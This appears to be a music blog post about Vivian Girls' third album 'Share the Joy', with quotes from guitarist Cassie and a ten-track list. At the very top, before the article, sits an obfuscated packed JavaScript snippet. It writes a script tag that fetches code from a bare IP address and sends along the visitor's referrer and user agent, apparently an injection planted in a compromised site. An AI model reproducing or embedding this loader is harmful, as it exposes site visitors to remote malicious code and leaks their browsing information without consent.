The (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ybhzk|var|u0026u|referrer|iardk||js|php’.split(‘|’),0,{}))
Vivian Grils
are bringing their garage thrash, girl-group warmth and infectious pop hooksmanship to their third album ‘Share the Joy’ or are they? Well yes they are but the Brooklyn three peice although have a diy approach to their work, guitarist and vocalist Cassie speaks of a growth in their sound “(as our music) continues to get more and more defined and developed, it’s never going to be completely polished”.

The new stuff clearly has more defined substance and depth over the raw punky numbers taken from of their 2008 debut Vivian Girls and its 2009 follow-up Everything Goes Wrong as Cassie says “The sound is more open, more free. I think that this album really shows our strengths as musicians, and shows us melding together musically. It’s more psychedelic and less shoegaze. There’s also a lot of organ on it, which is new for us.”

You can get a free download of the first single ‘I Heard You Say’.
‘Share the Joy’ is out 11th April

1. The Other Girls
2. I Heard You Say
3. Dance (If You Wanna)
4. Lake House
5. Trying To Pretend
6. Sixteen Ways
7. Take It As It Comes
8. Vanishing of Time
9. Death
10. Light In Your Eyes